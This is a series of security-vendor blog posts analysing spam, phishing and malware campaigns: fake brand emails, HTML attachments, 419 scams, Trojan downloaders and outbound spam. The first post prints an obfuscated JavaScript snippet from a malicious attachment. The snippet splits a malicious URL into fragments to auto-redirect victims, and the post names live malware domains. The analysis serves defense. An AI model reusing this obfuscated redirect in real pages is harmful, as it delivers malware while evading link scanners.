Commtouch labs have detected large volumes of emails with malicious HTML attachments. The emails purport to come from a range of legitimate sites including:
- Bell Canada
- Craigslist
- NewEgg
So let’s say you read our previous blog about the rise of the malicious HTML attachments. You open the attached HTML file in a text reader to find the malicious links – but your search for “http” only turns up genuine “newegg.com” links. Where is the rogue destination link? We find it hidden in the nasty script – but broken into little pieces:
<script>function r(){};fQ=false;d=”";r.prototype = {p : function() { this.j=”;var pN=54899;s=false;this.k=”k”;this.kH=22581;c=”;l=64422;document.location.href=
String(“htt“+”p:/“+”/tr“+”ace“+”boo“+”k.u“+”s/1“+”.ht…..“.substr(0,3)+”ml”);
this.g=59634;var o=false;z=”;f=”f”;e=”";y=22487;}};x=”";var gK=false;var zA=
new r(); pU=”;this.u=”u”;zA.p();var lK=false;</script>
In other words: http://tracebook.us/1ht… Opening the HTML file in your browser will automatically direct you to this link (or similar depending on the file received – in the example below it was http://enjoyyourhaircut.com/…).
Now comes our favorite part. The screen that greets you next:
4 seconds?? If you’re going to install malware get on with it already…
In February, we “recommended” that cybercriminals save time and money by using LinkedIn as a way to harvest email addresses and details about corporate employees. Instead, they have added LinkedIn to the pantheon of trusted brands being used to scam unaware recipients.
Thanks to the simplicity of the LinkedIn design, spammers have had an easy time of creating faked LinkedIn connection invitations and pending email messages. Check out the images below – one real and two fake.
The spammers did take our advice with regard to one item – they are using the name of a real company in the invitations. The links in the fake email messages lead to sites with malware as well as pharmacy sites. From the cybercriminals’ perspective, it makes perfect sense to use these links in their attempt to install malware onto unsuspecting computers. What doesn’t seem to make sense, though, is connecting LinkedIn spam to a pharmacy site. Maybe if the real company name they used was a large pharmaceutical company…
In the grand phishing universe, it’s clear that Amazon would be a target. This particular phishing outbreak caught our eye though. It starts with a typical “account verification” email. Recipients must submit the required information or they will suffer the dreaded “locked account”.
Opening the attached HTML file reveals phishing for more than just a username and password. The focus instead is on credit card information – a truly comprehensive request for every last detail – even the ATM PIN.
We hope no one filled it in – but those who did and clicked on “continue” would be lead to the Amazon homepage. We note the use of an HTML attachment – when opened, the URL reflects a local file as opposed to a suspicious non-Amazon URL. But then there is that request for the ATM PIN…
Perhaps you’ve gotten used to phishing, spam and scams supposedly coming from Facebook, Apple and Google. Now, though, even trusted brands that we thought were safe are being used in an attempt to get recipients to click the embedded URLs. Check out the emails below, both related to “recent account opening activity”.
Wikipedia and WordPress, whose low-key designs are imprinted in our consciousness, were recently used in outbreaks spreading pharmacy spam. Yes, pharmacy spam. Of course, we’re not exactly sure why they thought our interest in Wikipedia and WordPress would transfer to an interest in low-priced meds.
We aren’t surprised. To be effective, cybercriminals have to gain access to you by leveraging trusted brands that you are exposed to on a daily basis. This means that they must constantly move on, hoping you’ll slip up and click on a link.
So, as usual, continue your vigilance against spam, scams, phishing, and malware from any site, any time, anywhere… (or get a good spam and Web filtering solution).
One of the advantages of following us on Twitter is that you get our #Sillyspam posts. In their efforts to confound mail filters, spammers often need to perform all sorts of language acrobatics. We usually feel compelled to add a comment to these amusing bits of email – and we summarize our favorites every 3 months in our Trend Report. A selection from Q2 2010 (the format is “sillyspam” // Commtouch comment):
- “Are you late for appointments and girls leave you?” // And I thought it was the aftershave!
- “Our watches don’t wear off like clothes” // but are they tumble-dryer safe?
- “Make it longer than the Great China Wall!” // Don’t you have something in a medium?
- “Sold Out - LIMITED UNITS WATCHES!” // Sold out! – what a pity… I would have bought one
- “contact Him now via e-mail/phone” // No need to go to church/synagogue then?
- “Your wrist is screaming for a new watch” // My wrist should be more polite
- “You would may never know” // I might could not understand
And now – we can no longer resist.
Enter: Silly-419.
In their efforts to continually invent new ways of extorting money from the unaware, 419ers need new stories and new names. Some of these really stretch credibility or are just .. well… silly. So – every once in a while – we will share our current favorites with you. First we are reminded of our recent post concerning the “Harry Potter Foundation” as well as Facebook “compensating” users.
Or how about this one: Freemasons inviting new members by email! From our limited knowledge of the way these things work, it’s not that easy to join up – and we doubt the initial approach is by poorly-worded-email. Naturally you should “never share this information with anyone”.
Imagine receiving the good news about an unexpected inheritance – and from a guy called “Goodluck” – it’s just too good to be true!
Don’t you think it would be more plausible if you used a name like “Henry Salami”?
More to come…
Last week we saw an interesting series of emails which seemed to indicate a mid-outbreak change of tactic. The initial series of emails all had banking and account related themes. The emails indicated that it was necessary to open an attached document file. The attachments were actually zipped executable Trojan downloaders.
A Virus-Total (www.virustotal.com) scan showed reasonably high detection rates amongst AV vendors (although we gave them a very generous three days). At this point we would remind readers about the importance of zero-hour detection as provided by certain products. Updating signature files many hours after an outbreak will not protect users who receive these attached files before the update has been made available and downloaded. Note the file size – a relatively large 150KB.
Similar account-themed emails continued to appear over the next 2 days – but this time with an embedded link. The executable file with an almost identical large file size was again categorized as a Trojan downloader. Here again we tested the file at Virus Total one day after the outbreak (as above – this is lots of time in outbreak terms) and got a 66% detection rate.
The 150KB file size is shown below.
The conclusion for malware distributors: If at first you don’t succeed – send a link…
Well-crafted emails mimicking Amazon order confirmations have been detected in large quantities in the past week. The Amazon logo and “your account” button actually take image files from the Amazon website. The email includes twelve links designed to motivate recipients to click:
- More information about an Amazon Visa card
- The ordered items are not shown and are linked
- The identity of “ordered by:” requires a click
- Perhaps intentionally the order amounts do not add up leading a recipient to seek clarification by clicking on the order number
- The header and footer of the message include “your account”, Help department”, and “amazon.com” links
The links all lead to short-lived websites hosting malicious pdf files. The pdf file is executed within an iframe and is therefore launched without user approval. This final aspect highlights the importance of having a Web security solution to protect users.
In the last few weeks we have detected increasing usage of HTML attachments in a variety of message types – all of them attempting to install malware. These sorts of attachments are generally not blocked by message scanning systems. In addition they may arouse less suspicion in users than zipped attachments.
In the examples below, the malware is either in the form of a script within the attached HTML or, more traditionally, leads to a website with some form of malicious script:
- Youtube friend invitation – includes Trojan downloader within HTML
- Delivery status notification – includes Trojan downloader within HTML
- Spam “hot news for you” – leads to a pharmacy website with malware script
Recently, our service provider customers have become increasingly vocal about the problem of outbound spam, the spam generated within their own networks. We recently sponsored a survey with Osterman Research asking Web hosting companies, ISPs, and email managed service providers how they manage outbound spam.
As you can see from our beautiful chart – service providers are trying a range of methods to stop outbound spam before it becomes inbound spam in someone else’s network. The chart is taken from the Osterman research report into outbound spam commissioned by Commtouch available for download here: http://www.commtouch.com/outbound-spam-report
These solutions create other issues such as false positives and blocked legitimate users while missing low volume or regional outbound spam (potentially leading to being blocklisted) as shown in the graphic below.
As always, the key is to find an effective solution that creates the ever desirable win-win solution: You save your IP reputation, your customers are happier, and you can appropriately apportion your resources without the additional volume from the zombies and spammers.
Zombies, compromised accounts, and malicious users are just some of the friendly neighborhood spammers on service providers’ networks. Every piece of spam going in AND getting out is your problem, long before it becomes someone else’s. Commtouch recently commissioned a survey by Osterman Research to determine the state of the industry with regard to outbound spam.
One key finding is that fighting outbound spam is expensive. Sixty-eight percent of service providers are spending up to $100,000 per year on controlling the problem. Four percent are spending more than $250,000. Fighting outbound spam is important to your customers, too. Eighty-seven percent believe it is important or extremely important for email providers to actively eliminate zombies – a primary source of outbound spam – from their networks.
The research investigates all aspects of the outbound spam problem and is available for download here: http://www.commtouch.com/outbound-spam-report
Resolving the outbound spam issue also can help service providers to retain customers: our research found that 56% of end users whose outbound email was blocked because of their providers’ outbound spam problem would switch to a provider that would not block innocent users.
